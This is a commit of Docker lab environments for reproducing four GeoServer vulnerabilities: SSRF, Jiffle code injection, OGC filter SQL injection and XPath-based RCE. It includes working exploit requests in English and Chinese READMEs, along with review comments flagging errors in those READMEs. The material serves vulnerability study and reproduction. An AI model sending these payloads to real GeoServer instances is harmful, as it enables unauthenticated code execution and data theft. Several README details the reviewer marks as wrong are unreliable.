first commit
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions


@@ -0,0 +1,54 @@
# GeoServer Unauthenticated Server-Side Request Forgery (CVE-2021-40822)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In GeoServer versions prior to 2.19.3, 2.18.5, and 2.17.6, there is a Server-Side Request Forgery (SSRF) vulnerability in the WMS GetMap request. An attacker can exploit this vulnerability to make requests to internal or external services through the GeoServer server.
References:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf>
- <https://nvd.nist.gov/vuln/detail/CVE-2021-40822>
## Vulnerable Environment
Execute the following command to start a GeoServer 2.19.1 server:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
The vulnerability exists in the `TestWfsPost` endpoint. An attacker can use the `url` parameter to make the server send requests to arbitrary URLs. The endpoint accepts several parameters:
- `url`: The target URL that GeoServer will send request to
- `body`: The request body to be sent. If this parameter is empty, GeoServer will send a GET request; if it contains any value, GeoServer will send a POST request
- `username`: Username for basic authentication (optional)
- `password`: Password for basic authentication (optional)
Send the following request to the `TestWfsPost` endpoint:
```
POST /geoserver/TestWfsPost HTTP/1.1
Host: internal
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
form_hf_0=&url=http://interal/geoserver/../&body=testtest&username=admin&password=admin
```
Use `google.com` as the target URL, and you will see that response from `google.com` is returned.
![](1.png)
> Note: The host in the `url` parameter must match the `Host` header in your request, otherwise GeoServer will return an error. For example, if the domain in `url` parameter is `internal`, then the `Host` header should also be `internal`.
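Review bot: the intro (`there is a Server-Side Request Forgery (SSRF) vulnerability in the WMS GetMap request`) contradicts the Exploit section, which places the bug in the `TestWfsPost` servlet and never touches WMS; name one vector, and make it `TestWfsPost`, since that is what the request actually hits. The sample request is also inconsistent with its own prose: `url=http://interal/geoserver/../` (note the typo) cannot match `Host: internal`, which the closing note says is mandatory, and `Use google.com as the target URL` describes a request that is not the one shown; pick a single target (`http://internal/...` with `Host: internal`) and keep text and request in step. While there, say outright what the closing note only implies: the only origin check compares the `url` host against the client-supplied `Host` header, which is exactly why it does not stop the SSRF. Finally, the first reference, GHSA-7g5f-wrx8-5ccf, is cited again in this commit as the advisory for CVE-2023-25157 (SQL injection); one of the two READMEs links the wrong advisory, so verify which CVE it covers.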


@@ -0,0 +1,52 @@
# GeoServer 未授权SSRF漏洞CVE-2021-40822
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在GeoServer 2.19.3、2.18.5和2.17.6版本之前WMS GetMap请求中存在服务器端请求伪造SSRF漏洞。攻击者可以利用此漏洞通过GeoServer服务器向内部或外部服务发送请求。
参考链接:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf>
- <https://nvd.nist.gov/vuln/detail/CVE-2021-40822>
## 漏洞环境
执行如下命令启动一个GeoServer 2.19.1服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
漏洞存在于TestWfsPost接口中。攻击者可以利用`url`参数使服务器向任意URL发送请求。该接口接受以下参数
- `url`GeoServer将要发送请求的目标URL
- `body`要发送的请求体内容。如果此参数为空GeoServer将发送GET请求如果包含任何值则GeoServer将发送POST请求
- `username`:基础认证的用户名(可选)
- `password`:基础认证的密码(可选)
发送如下请求来复现漏洞:
```
POST /geoserver/TestWfsPost HTTP/1.1
Host: internal
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
form_hf_0=&url=http://interal/geoserver/../&body=testtest&username=admin&password=admin
```
比如,使用`google.com`作为目标URL你将看到`google.com`的响应。
![](1.png)
> 注意:`url`参数中的主机名必须与请求中的`Host`头部值相同否则GeoServer会返回错误。例如如果`url`参数中的主机名是`internal`,那么请求中的`Host`头部值也必须是`internal`。
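Review bot: same two inconsistencies as the English README: the intro locates the SSRF in the WMS GetMap request (`WMS GetMap请求中存在服务器端请求伪造`) while the reproduction section uses `TestWfsPost`, and the body has `url=http://interal/...` against `Host: internal`, contradicting the closing note that the two must match; fix both so the Chinese and English pages describe the same request.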


@@ -0,0 +1,6 @@
services:
web:
image: vulhub/geoserver:2.19.1
ports:
- "8080:8080"
- "5005:5005"
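Review bot: the `"5005:5005"` mapping is never mentioned in either README; 5005 is the conventional JVM remote-debug (JDWP) port, and if that is what the image listens on it should be documented as lab-only (an open JDWP port is its own code-execution path, independent of the CVE being demonstrated) or dropped from the published compose file, leaving only 8080.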


@@ -0,0 +1,80 @@
# GeoServer Remote Code Injection caused by JAI-EXT (CVE-2022-24816/CVE-2023-35042)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
GeoServer uses the Jiffle map algebra language provided by JAI-EXT, which allows efficiently execute map algebra over large images. A code injection vulnerability (CVE-2022-24816) has been found in JAI-EXT versions 1.2.21 and earlier, that allows a remote code execution to be performed by properly crafting a Jiffle invocation.
When this vulnerability affects GeoServer, it is also known as [CVE-2023-35042](https://osgeo-org.atlassian.net/browse/GEOS-10458). GeoServer versions 2.20.4, 2.19.6, and 2.18.6 and later have fixed this vulnerability by updating the JAI-EXT dependency.
References:
- <https://www.synacktiv.com/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver>
- <https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx>
- <https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html>
- <https://osgeo-org.atlassian.net/browse/GEOS-10458>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24816.yaml>
## Vulnerable Environment
Execute the following command to start a GeoServer 2.17.2 server:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
The vulnerability exists in the WMS endpoint. An attacker can execute arbitrary Java code by sending a specially crafted request to `/geoserver/wms`. The request should include a malicious Jiffle expression that will be evaluated by the server.
Send a request like this to exploit the vulnerability:
```
POST /geoserver/wms HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 2191
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
```
After sending this request, the malicious Java code embedded in the Jiffle script will be executed by the server. The command output will be captured and returned to the client within a `java.lang.ExceptionInInitializerError` message:
![](1.png)
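Review bot: the Exploit section says `The vulnerability exists in the WMS endpoint` and that the request goes to `/geoserver/wms`, but the payload is a WPS `Execute` of the `ras:Jiffle` process (`service="WPS"`, `<ows:Identifier>ras:Jiffle</ows:Identifier>`); GeoServer's OWS dispatcher routes on the `service` attribute in the body rather than on the URL path, which is why the request works, but the vulnerable component is the WPS Jiffle process, and the text should say so and note that the WPS extension must be present for the process to exist. Also give the fixed JAI-EXT version (the Chinese README says 1.2.22; the English text only says `updating the JAI-EXT dependency`) so the two pages agree.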


@@ -0,0 +1,78 @@
# GeoServer JAI-EXT 导致远程代码注入漏洞CVE-2022-24816/CVE-2023-35042
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
GeoServer 使用 JAI-EXT 提供的 Jiffle 地图代数语言,这让使用者可以高效地在大图像上执行地图查询。在 JAI-EXT 1.2.21 及更早版本中存在一个代码注入漏洞CVE-2022-24816该漏洞允许攻击者通过精心构造的 Jiffle 调用来执行远程代码。
在 GeoServer 中,这个漏洞也被称为 [CVE-2023-35042](https://osgeo-org.atlassian.net/browse/GEOS-10458)。GeoServer 2.20.4、2.19.6 和 2.18.6 及更高版本通过将 JAI-EXT 依赖项更新到 1.2.22 修复了这个问题。
参考链接:
- <https://www.synacktiv.com/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver>
- <https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx>
- <https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html>
- <https://osgeo-org.atlassian.net/browse/GEOS-10458>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24816.yaml>
## 漏洞环境
执行如下命令启动一个GeoServer 2.17.2服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
漏洞存在于WMS接口中。攻击者可以通过向`/geoserver/wms`发送特制的请求来执行任意Java代码。请求中需要包含一个恶意的Jiffle表达式这个表达式将被服务器执行。
发送如下请求来复现漏洞:
```
POST /geoserver/wms HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 2191
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
```
这样数据包中的Jiffle表达式中的Java代码将被服务器执行执行结果将返回在`java.lang.ExceptionInInitializerError`消息中:
![](1.png)
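Review bot: `漏洞存在于WMS接口中` and the pointer to `/geoserver/wms` mislabel the vector; the request is a WPS `Execute` of `ras:Jiffle`, so this sentence should name the WPS Jiffle process and, if the path is kept, say that it is accepted only because the dispatcher honours `service="WPS"` in the body.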


@@ -0,0 +1,6 @@
services:
web:
image: vulhub/geoserver:2.17.2
ports:
- "8080:8080"
- "5005:5005"


@@ -0,0 +1,41 @@
# GeoServer OGC Filter SQL Injection (CVE-2023-25157)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In the version prior to 2.22.1 and 2.21.4, there is a SQL injection issue that was found in the filter and function expressions defined by the Open Geospatial Consortium (OGC) standards.
References:
- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
## Vulnerable environment
Execute following command to start a GeoServer instance 2.22.1:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
First of all, you have to find a existing workspace that contains PostGIS datastore before you exploit the vulnerability. Vulhub's GeoServer instance already have a PostGIS datastore:
- Workspace name: `vulhub`
- Data store name: `pg`
- Feature type (table) name: `example`
- One of attribute from feature type: `name`
Exploit the server by this simple URL:
```
http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
```
![](1.png)
As you can see, the version of PostgreSQL has been retrieved from GeoServer by SQL injection.
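Review bot: `In the version prior to 2.22.1 and 2.21.4` cannot be right, because the very next section starts GeoServer 2.22.1 as the vulnerable target; the Chinese README says 2.22.1 and 2.21.4 `及以前` (and earlier), which matches the environment, so change the English to `2.22.1, 2.21.4 and earlier`. Two smaller points: the second reference, GHSA-7g5f-wrx8-5ccf, is also listed under CVE-2021-40822 earlier in this commit, so confirm which advisory it is; and the Exploit section tells the reader to `find a existing workspace that contains PostGIS datastore` without saying how, although the CVE-2024-36401 README in this commit already notes that the layer list is visible on the web UI without login, and the attribute names of a public layer are exposed the same way through WFS `DescribeFeatureType`; one sentence to that effect would make the prerequisite actionable. Grammar: `a existing`, `already have`, `One of attribute from feature type`.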


@@ -0,0 +1,39 @@
# GeoServer OGC Filter SQL注入漏洞CVE-2023-25157
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在版本2.22.1和2.21.4及以前多个OGC表达式中均存在SQL注入漏洞。
参考链接:
- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
## 漏洞环境
执行如下命令启动一个GeoServer 2.22.1
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080/geoserver`即可查看到GeoServer的首页。
## 漏洞复现
在利用漏洞前需要目标服务器中存在类型是PostGIS的数据空间datastore和工作空间workspace。在Vulhub中已经包含满足条件的工作空间其信息如下
- Workspace name: `vulhub`
- Data store name: `pg`
- Feature type (table) name: `example`
- One of attribute from feature type: `name`
利用这些已知参数发送如下URL即可触发SQL注入漏洞
```
http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
```
![](1.png)
可见已经使用SQL注入获取到了目标服务器PostgreSQL的版本。
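Review bot: `数据空间` is not the GeoServer term; the REST path used in startup.sh (`/datastores`) and the English README both call it a data store (`数据存储`), so use that word here so readers can find it in the admin UI. The version sentence here (`2.22.1和2.21.4及以前`) is the correct one and the English README should be brought in line with it rather than the other way round.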


@@ -0,0 +1,16 @@
version: '3'
services:
web:
image: vulhub/geoserver:2.22.1
depends_on:
- postgres
ports:
- "8080:8080"
volumes:
- ./startup.sh:/startup.sh
command: bash /startup.sh
postgres:
image: postgis/postgis:14-3.3-alpine
environment:
- POSTGRES_PASSWORD=vulhub
- POSTGRES_DB=geoserver
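Review bot: `depends_on` here only orders container start-up; it does not wait for PostgreSQL to accept connections, and `startup.sh` polls only GeoServer's REST status, never the database, so the datastore creation can race a slow Postgres init. Add a `healthcheck` (e.g. `pg_isready -U postgres`) to the `postgres` service and use the long form `depends_on: postgres: condition: service_healthy`, or poll the database from the script before creating the datastore.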


@@ -0,0 +1,28 @@
#!/bin/bash
AUTH="admin:geoserver"
/mnt/geoserver/bin/startup.sh &
GEOSERVER_PID=$!
SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
while [ "$SERVER_ALIVE" -ne 200 ]
do
echo "geoserver is not ready yet, waiting for 1 second..."
sleep 1
SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
done
VULHUB_EXISTS=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/workspaces/vulhub)
if [ "${VULHUB_EXISTS}" -eq 200 ]; then
echo "vulhub wordspace already exists"
else
# refer to <https://github.com/geoserver/geoserver-history/blob/master/doc/en/user/source/restconfig/rest-config-examples/rest-config-examples-curl.rst>
curl -XPOST -u "$AUTH" -H "Content-type: application/json" -d '{"workspace":{"name":"vulhub"}}' http://localhost:8080/geoserver/rest/workspaces
curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' \
-d '{"dataStore":{"name":"pg","connectionParameters":{"host":"postgres","port":5432,"database":"geoserver","user":"postgres","passwd":"vulhub","dbtype":"postgis","createDatabase":true}}}' \
http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores
curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' -d '{"featureType":{"name":"example","attributes":{"attribute":[{"name":"name","binding":"java.lang.String"}]}}}' http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores/pg/featuretypes
echo "target geoserver is initialized successfully"
fi
wait $GEOSERVER_PID
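Review bot: none of the three REST `curl -XPOST` calls checks its result, so if the workspace, datastore or feature-type creation fails (most likely the datastore call, since nothing waits for Postgres), the script still prints `target geoserver is initialized successfully` and the exploit URL in the README will 404 with no hint why. Use `curl -sf` (or `--fail-with-body`) together with `set -e`, or test `$?` after each call and exit non-zero. Minor: `vulhub wordspace already exists` (typo: workspace); and because `bash /startup.sh` runs as PID 1 and does not trap SIGTERM, `docker compose down` will sit through the stop timeout and then SIGKILL GeoServer; either `trap` the signal and forward it to `$GEOSERVER_PID`, or run the service with `init: true` in the compose file.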


@@ -0,0 +1,80 @@
# GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions (CVE-2024-36401)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
References:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>
- <https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>
- <https://tttang.com/archive/1771/>
- <https://github.com/Warxim/CVE-2022-41852>
## Vulnerable environment
Execute following command to start a GeoServer server 2.23.2:
```
docker compose up -d
```
After server is started, you will see the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
In the official [vulnerability announcement](https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv), you can find the following content:
> No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
For example, I gonna to use `GetPropertyValue` to execute evil xpath expression. refer to [official document](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst), the GET method POC is:
```
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
The POST method POC is:
```
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
```
The familiar `java.lang.ClassCastException` error:
![](1.png)
As you can see, `touch /tmp/success1` and `touch /tmp/success2` are both executed successfully.
![](2.png)
It is important to mention that `typeNames` parameter must exist. You can find all the available Types on the web server without login:
![](3.png)
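Review bot: `In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5` and the Chinese README's `2.25.1 2.24.3 2.23.5版本及以前` (those versions and earlier) state different boundaries; the advisory in the first reference gives the fixed releases, so take the wording from there and use it in both READMEs. In the POST PoC the `xmlns:topp` and `xmlns:fes` declarations are unused and the `sf` prefix in `typeNames='sf:archsites'` is not declared; it still works because the prefix is matched against GeoServer workspace names rather than the document's namespace declarations, which is worth a sentence so readers do not "fix" it and wonder why nothing changed. The English page also omits the root cause the Chinese page names (property names evaluated as XPath through Apache Commons JXPath); add it. Style: `I gonna to use` -> `I am going to use`.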


@@ -0,0 +1,78 @@
# GeoServer 属性名表达式前台代码执行漏洞CVE-2024-36401
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在GeoServer 2.25.1 2.24.3 2.23.5版本及以前未登录的任意用户可以通过构造恶意OGC请求在默认安装的服务器中执行XPath表达式进而利用执行Apache Commons Jxpath提供的功能执行任意代码。
参考链接:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>
- <https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>
- <https://tttang.com/archive/1771/>
- <https://github.com/Warxim/CVE-2022-41852>
## 漏洞环境
执行如下命令启动一个GeoServer 2.23.2服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
在官方[漏洞通告](https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv)中提到可以找到漏洞相关的WFS方法
> No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
比如,我这里使用`GetPropertyValue`来执行xpath表达式。参考[官方文档](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst)我构造了两个POC。基于GET方法的POC
```
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
基于POST方法的POC
```
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
```
熟悉的`java.lang.ClassCastException`错误,说明命令已执行成功。
![](1.png)
进入容器可见,`touch /tmp/success1``touch /tmp/success2`均已成功执行。
![](2.png)
值得注意的是typeNames必须存在我们可以在Web页面中找到当前服务器中的所有Types
![](3.png)
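Review bot: the version sentence here (those releases `及以前`, i.e. and earlier) and the English README's `prior to 2.25.1, 2.24.3 and 2.23.5` disagree; align both with the fixed releases listed in the linked GHSA so the two pages give the same affected range.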


@@ -0,0 +1,7 @@
version: '3'
services:
web:
image: vulhub/geoserver:2.23.2
ports:
- "8080:8080"
- "5005:5005"
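Review bot: the `version: '3'` key is obsolete under Compose v2 (it only produces a warning) and the compose files for CVE-2021-40822 and CVE-2022-24816 in this commit already omit it; drop it here and in the CVE-2023-25157 file so all four match. The `"5005:5005"` mapping is again undocumented; if it is the JVM debug port, either state that in the README as lab-only or remove it.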